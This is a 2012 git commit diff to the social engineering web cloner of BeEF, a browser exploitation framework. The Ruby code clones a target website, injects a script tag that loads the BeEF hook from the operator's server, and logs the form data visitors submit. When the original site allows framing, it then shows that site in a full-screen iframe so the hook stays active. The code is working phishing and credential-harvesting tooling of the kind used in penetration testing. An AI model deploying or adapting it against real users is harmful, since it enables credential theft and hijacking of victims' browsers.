Social Eng. extension: if the page can be framed, load it in an overlay iFrame maintaining the hook :D

2012-08-29 21:08:07 +01:00
parent 0260181d33
commit 26c7696e0f
2 changed files with 41 additions and 16 deletions
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -19,24 +19,25 @@ module BeEF

      class Interceptor < Sinatra::Base

-      def initialize(file_path, redirect_to)
+      def initialize(file_path, redirect_to, frameable, beef_hook)
        super self
        file = File.open(file_path,'r')
        @cloned_page = file.read
        @redirect_to = redirect_to
+        @frameable = frameable
+        @beef_hook = beef_hook
        file.close
-        print_info "Cloned page using content from [cloned_pages/#{File.basename(file_path)}] initialized."
+        print_info "Cloned page with content from [cloned_pages/#{File.basename(file_path)}] initialized."
      end

      # intercept GET
      get "/" do
        print_info "GET request"
+        print_info "Referer: #{request.referer}"
        @cloned_page
      end

      # intercept POST
-      # the 'action' attribute of the 'form' element is modified to the URI /
-      # in this way the request can be intercepted
      post "/" do
        print_info "POST request"
        request.body.rewind
@@ -44,13 +45,14 @@ module BeEF
        print_info "Intercepted data:"
        print_info data

-        redirect @redirect_to
-
-        #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
-        #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
-        #todo: to the original page
+        if @frameable
+          print_info "Page can be framed :-) Loading original URL into iFrame..."
+          "<html><head><script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head></head><body><iframe src=\"#{@redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
+        else
+          print_info "Page can not be framed :-) Redirecting to original URL..."
+          redirect @redirect_to
+        end
      end
-
      end
    end
  end
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -24,6 +24,7 @@ module BeEF
          @http_server = BeEF::Core::Server.instance
          @config = BeEF::Core::Configuration.instance
          @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
+          @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
        end

        def clone_page(url)
@@ -68,7 +69,10 @@ module BeEF
          print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"

          file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
-          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url))
+
+          # Check if the original URL can be framed
+          frameable = is_frameable(url)
+          @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url, frameable, @beef_hook))
          print_info "Mounting cloned page on URL [/#{output}]"
          @http_server.remap
        end
@@ -76,14 +80,33 @@ module BeEF
        private
        # Replace </head> with <BeEF_hook></head>
        def add_beef_hook(line)
-           host = @config.get('beef.http.host')
-           port = @config.get('beef.http.port')
-           js = @config.get('beef.http.hook_file')
-           hook = "http://#{host}:#{port}#{js}"
-           line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{hook}\"></script>\n</head>")
+           line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
           line
        end

+        private
+        # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
+        def is_frameable(url)
+          result = true
+          uri = URI(url)
+          http = Net::HTTP.new(uri.host, uri.port)
+          if uri.scheme == "https"
+            http.use_ssl = true
+            http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+          end
+          request = Net::HTTP::Get.new(uri.request_uri)
+          response = http.request(request)
+          frame_opt = response["X-Frame-Options"]
+
+          if frame_opt != nil
+            if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
+              result = false
+            end
+          end
+          print_info "Page can be framed: [#{result}]"
+          result
+        end
+
      end
    end
  end